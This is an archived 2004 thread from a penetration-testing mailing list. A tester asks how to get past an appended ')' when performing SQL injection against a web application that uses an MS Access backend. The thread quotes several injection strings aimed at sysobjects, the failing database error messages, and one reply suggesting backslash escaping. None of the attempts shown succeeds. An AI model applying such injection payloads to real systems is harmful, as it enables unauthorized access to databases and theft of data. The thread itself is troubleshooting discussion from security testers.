Penetration Testing mailing list archives

Fwd: RE: SQL-Injection escape ')'

From: Strcpy <elite_netbios () yahoo com>
Date: Mon, 5 Jul 2004 00:12:20 -0700 (PDT)

I tried "/" too , nothing new :-/
it`s goeing odd.
while useing the string :
A'\) select name from sysobjects where xtype='U'--

I get the " extra ) " error message wich is correct:

[Microsoft][ODBC Microsoft Access Driver] Extra ) in
query expression 'city_name='Tehran' and
(agency_english ='A'\) select name from sysobjects
where xtype='U'--')'. 

and when I try to remove that extra ")" , and bypass
the ')' , problem re-appear :


[Microsoft][ODBC Microsoft Access Driver] Extra ) in
query expression 'city_name='Tehran' and
(agency_english ='A'\) select name from sysobjects
where xtype='U' while ')'=')'. 

Still looking for your help.
ANY comment is appriciated.


                
__________________________________
Do you Yahoo!?
New and Improved Yahoo! Mail - Send 10MB messages!
http://promotions.yahoo.com/new_mail

--- Begin Message --- From: "Esmat, Ayman (ISS Middle East)" <AEsmat () iss net>
Date: Mon, 5 Jul 2004 07:54:41 +0200

Hi,

We used to put '\' before using the special-characters. Try this:
A'\) select name from sysobjects where xtype='U'--



-----Original Message-----
From: Strcpy [mailto:elite_netbios () yahoo com] 
Sent: Saturday, July 03, 2004 5:46 PM
To: pen-test () securityfocus com
Subject: SQL-Injection escape ')'

Hi list .

I`m working on a web-application for vulnerability
assesments in order to complete a pen-test job.

there is a vulnerable query there but I can`t escape
it ad use it to go farther .
the page script add a ')' to end of query string
always.
I tried to pass it by useing # or -- or ')'=')' at the
end of my query strings , but non worked :/

here is an example :
i sent this :
A') select name from sysobjects where xtype='U'--


[Microsoft][ODBC Microsoft Access Driver] Syntax
error. in query expression 'city_name='Tehran' and
(agency_english ='A') select name from sysobjects
where xtype='U'--')' 

would you mind please help me ?

[sorry for poor English]

thnq all




                
__________________________________
Do you Yahoo!?
Yahoo! Mail - 50x more storage than other providers!
http://promotions.yahoo.com/new_mail

--- End Message ---

Current thread:

SQL-Injection escape ')' Strcpy (Jul 04)
- Re: SQL-Injection escape ')' Fabrice MARIE (Jul 05)
- Re: SQL-Injection escape ')' Thor (Jul 05)
- Re: SQL-Injection escape ')' nummish (Jul 05)
- Re: SQL-Injection escape ')' Roman Medina (Jul 06)
- <Possible follow-ups>
- Fwd: RE: SQL-Injection escape ')' Strcpy (Jul 05)
- Fwd: RE: SQL-Injection escape ')' Strcpy (Jul 05)
- Re: SQL-Injection escape ')' Strcpy (Jul 05)
- RE: SQL-Injection escape ')' Esmat, Ayman (ISS Middle East) (Jul 05)